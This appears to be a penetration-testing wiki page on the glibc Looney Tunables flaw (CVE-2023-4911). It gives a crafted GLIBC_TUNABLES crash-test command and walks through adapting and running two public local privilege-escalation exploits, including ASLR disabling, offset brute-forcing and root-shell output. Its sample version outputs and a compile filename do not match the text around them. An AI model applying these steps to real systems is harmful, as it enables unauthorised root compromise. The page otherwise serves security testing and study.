Looney Tunables

CVE-2023-4911

Theory

CVE-2023-4911 (Looney Tunables) is a buffer overflow vulnerability in GNU C Library’s dynamic loader’s, known as ld.so, when processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.

This vulnerability was introduced in glibc version 2.34 through commit 2ed18c. The vulnerability affects recent versions of major Linux distributions such as RHEL, Ubuntu, Fedora , Debian, Amazon Linux, Gentoo and any other distribution that uses glibc.

The vulnerability impacts major Linux distributions, including:

Fedora 37 and 38
Ubuntu 22.04 and 23.04
Debian 12 and 13

Practice

To test directly whether the target is vulnerable, we can use the following command (vulnerable if there is a segmentation error):

$ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped)

If glibc version is greater or equal than 2.34, target may be vulnerable

$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Or we can retreive the version of glibc using the following C++ code

glibc.cpp

#include <stdio.h>
#include <stdlib.h>
#include <gnu/libc-version.h>

int main(int argc, char *argv[])
{
    // Print glibc version
    printf("GNU libc version: %s\n", gnu_get_libc_version());
    exit(EXIT_SUCCESS);
}

Compile the above code using the following command:

g++ -std=c++11 glibc.c -o glibc

And execute it

./glibc
GNU libc version: 2.31

Using gnu-acme.py (python) from bl4sty, we can abuse CVE-2023-4911 and easily adapt it to different ld.so build versions.

If the build identifier of your ld.so target matches one of the script's targets. The exploit will work straight away.

python3 gnu-acme.py

If not, we have to find usable offsets for the ld.so build id. First you will have to find the target build identifier.

# Method 1: run gnu-acme.py
$ python3 gnu-acme.py
[...]
error: no target info found for build id b7ea093065488e439cf8ff6bc8bc545f5e1717c7

# Method 2: with native tools
$ readelf -n $(which ld.so) | grep "Build ID" | awk '{print $NF}' | xxd -r -p | tail -c 20 | xxd -p -c 20
b7ea093065488e439cf8ff6bc8bc545f5e1717c7

Now, on a similar environement (obviously with the same ld.so build version), disable ASLR and run gnu-acme.py. It will find usable offsets.

# On similar environement as the target
## Disable ASLR (as root)
echo 0 > /proc/sys/kernel/randomize_va_space

## Run gnu-acme.py
python3 gnu-acme.py
[...]
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 620
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 621
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 622
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 623

Take one of the working offset and add it to the TARGETS array of the gnu-acme.py script

TARGETS = {
    "69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
    "3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
    "b7ea093065488e439cf8ff6bc8bc545f5e1717c7": 620,
    "a99db3715218b641780b04323e4ae5953d68a927": 561,
    "a8daca28288575ffc8c7641d40901b0148958fb1": 580,
    "61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
    "9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
    "e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
    "956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
}

Now, on the target run exploit again !

$ python3 gnu-acme.py
[...]
** ohh... looks like we got a shell? **
whoami
root

Using this exploit from leesh3288, we can abuse CVE-2023-4911.

Code has been tested on Ubuntu 22.04.3 with glibc version 2.35-0ubuntu3.3.

First we need to execute the Python script to generate the malicious libc.so.6

python3 gen_libc.py

Compile the exploit

gcc -o exp exp.c

Finally, you can launch the exploit and be patient since the exploitation may take some time (5 to 20 mins).

$ ./exp
try 100
try 200
[snip]
try 3700
try 3800
# whoami
root

Resources

https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt

Last updated 1 year ago